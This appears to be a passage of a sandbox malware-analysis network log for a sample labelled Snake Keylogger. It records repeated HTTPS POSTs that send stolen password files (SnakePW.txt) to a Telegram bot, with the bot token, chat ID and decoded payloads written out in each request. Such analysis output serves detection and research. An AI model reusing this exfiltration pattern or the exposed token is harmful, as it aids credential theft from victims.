                                                                    2022-06-26 07:33:27 UTC197OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 31 62 35 35 35 30 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756f1b5550fContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:28 UTC198INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:28 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:28 UTC198INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 37 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 30 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66876,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228807,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    118192.168.2.549970149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:28 UTC199OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756f1f0f03d
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:28 UTC199OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 31 66 30 66 30 33 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756f1f0f03dContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:28 UTC200INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:28 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:28 UTC200INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 37 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 30 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66877,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228808,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    119192.168.2.549972149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:28 UTC200OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756f24462a8
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:28 UTC201OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 32 34 34 36 32 61 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756f24462a8Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:28 UTC201INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:28 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:28 UTC202INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 37 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 30 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66878,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228808,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    12192.168.2.549780149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:32:43 UTC20OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756d725a9d7
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:32:43 UTC20OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 64 37 32 35 61 39 64 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756d725a9d7Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:32:43 UTC21INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:32:43 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:32:43 UTC21INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 37 35 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 36 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66758,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228763,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    120192.168.2.549973149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:29 UTC202OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756f290ad11
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:29 UTC202OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 32 39 30 61 64 31 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756f290ad11Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:29 UTC203INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:29 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:29 UTC203INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 38 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 30 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66880,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228809,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    121192.168.2.549974149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:29 UTC204OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756f2c783aa
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:29 UTC204OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 32 63 37 38 33 61 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756f2c783aaContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:29 UTC205INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:29 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:29 UTC205INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 38 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 30 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66881,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228809,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    122192.168.2.549975149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:30 UTC206OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756f3031ddf
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:30 UTC206OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 33 30 33 31 64 64 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756f3031ddfContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:30 UTC206INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:30 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:30 UTC207INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 38 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 31 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66882,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228810,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    123192.168.2.549976149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:31 UTC207OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756f40e254e
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
